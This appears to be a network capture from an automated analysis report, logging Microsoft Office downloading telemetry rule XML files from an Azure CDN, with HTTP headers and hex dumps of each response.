                                                                                2024-10-04 09:34:04 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                72192.168.2.55546713.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:04 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:04 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:04 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 432
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                ETag: "0x8DC582BAABA2A10"
                                                                                x-ms-request-id: 15fe1592-a01e-0002-378c-155074000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093404Z-15767c5fc55tsfp92w7yna557w0000000c7g00000000b1vq
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:04 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                73192.168.2.55547013.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:04 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:04 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:04 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 475
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                ETag: "0x8DC582BBA740822"
                                                                                x-ms-request-id: b9a19b13-401e-0078-148c-154d34000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093404Z-15767c5fc55sdcjq8ksxt4n9mc00000001kg000000009n9r
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:04 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                74192.168.2.55547113.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:04 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:04 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:04 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 427
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                ETag: "0x8DC582BB464F255"
                                                                                x-ms-request-id: 9bed6e8e-001e-0046-5b8c-15da4b000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093404Z-15767c5fc55qkvj6n60pxm9mbw00000001dg000000008kpy
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:04 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                75192.168.2.55547313.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:05 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:05 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:05 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 474
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                ETag: "0x8DC582BA4037B0D"
                                                                                x-ms-request-id: e08726cd-901e-00a0-738c-156a6d000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093405Z-15767c5fc55gq5fmm10nm5qqr80000000cgg000000002sq5
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:05 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                76192.168.2.55547413.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:05 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:05 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:05 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 419
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                ETag: "0x8DC582BA6CF78C8"
                                                                                x-ms-request-id: 766164d5-c01e-0082-668c-15af72000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093405Z-15767c5fc55gq5fmm10nm5qqr80000000ccg000000007utx
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:05 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                77192.168.2.55547513.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:05 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:05 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:05 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 472
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                ETag: "0x8DC582B984BF177"
                                                                                x-ms-request-id: dcc4dd0d-f01e-0099-7c8c-159171000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093405Z-15767c5fc5546rn6ch9zv310e00000000590000000006wgm
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:05 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                78192.168.2.55547813.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:05 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:05 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:05 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 468
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                ETag: "0x8DC582BBA642BF4"
                                                                                x-ms-request-id: 4a2177bf-401e-00a3-638c-158b09000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093405Z-15767c5fc55sdcjq8ksxt4n9mc00000001qg00000000419t
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:05 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                79192.168.2.55547713.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:05 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:05 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:05 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 405
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                ETag: "0x8DC582B942B6AFF"
                                                                                x-ms-request-id: d59d44fd-601e-003e-698c-153248000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093405Z-15767c5fc55fdfx81a30vtr1fw0000000ckg000000009uet
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:05 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                80192.168.2.55548113.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:06 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:06 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:06 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 174
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                ETag: "0x8DC582B91D80E15"
                                                                                x-ms-request-id: 4da5cae8-a01e-0070-0e8c-15573b000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093406Z-15767c5fc55ncqdn59ub6rndq00000000c0g000000005a7s
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:06 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                81192.168.2.55548213.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:06 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:06 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:06 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1952
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                ETag: "0x8DC582B956B0F3D"
                                                                                x-ms-request-id: 1cc30b66-e01e-0071-368c-1508e7000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093406Z-15767c5fc554wklc0x4mc5pq0w0000000cr0000000003dzx
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:06 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                82192.168.2.55548313.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:06 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:06 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:06 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 958
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                ETag: "0x8DC582BA0A31B3B"
                                                                                x-ms-request-id: 8e9c9a52-201e-000c-6b8c-1579c4000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093406Z-15767c5fc554w2fgapsyvy8ua00000000bx0000000002rt0
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
